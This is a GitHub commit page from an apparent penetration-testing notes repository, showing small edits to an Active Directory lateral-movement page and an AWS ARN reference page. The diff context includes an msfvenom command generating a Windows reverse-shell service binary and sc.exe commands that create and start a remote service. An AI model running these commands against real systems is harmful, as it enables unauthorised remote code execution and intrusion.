Skip to content

Commit

Permalink
GITBOOK-663: change request with no subject merged in GitBook
Browse files Browse the repository at this point in the history
  • Loading branch information
fborsani authored and gitbook-bot committed May 13, 2024
1 parent 6439afc commit 6b8045b
Show file tree
Hide file tree
Showing 2 changed files with 3 additions and 3 deletions.
4 changes: 2 additions & 2 deletions active-directory/lateral-movement.md
Original file line number Diff line number Diff line change
Expand Up @@ -13,8 +13,8 @@ msfvenom -p windows/shell/reverse_tcp -f exe-service LHOST=<ip> LPORT=<port> -o
With sc.exe

```
sc.exe \\<host> create THMservice binPath="<cmd>" start= auto
sc.exe \\<host> start THMservice
sc.exe \\<host> create <service name> binPath="<cmd>" start=auto
sc.exe \\<host> start <service name>
```

With schtasks
Expand Down
2 changes: 1 addition & 1 deletion cloud-aws/references.md
Original file line number Diff line number Diff line change
Expand Up @@ -15,7 +15,7 @@ arn:partition:service:region:account-id:resource-type:resource-id
* [Region](references.md#regions)
* Account-id: account id of the resource owner
* Resource-id: id code of the specified resource or service
* Resource-type: some resource categories allow more granularity whensearching for a particular resource. For instance EC2 services can be subdivided into instances, images, security groups and so on
* Resource-type: some resource categories allow more granularity when searching for a particular resource. For instance EC2 services can be subdivided into instances, images, security groups and so on

## Services

Expand Down

0 comments on commit 6b8045b

Please sign in to comment.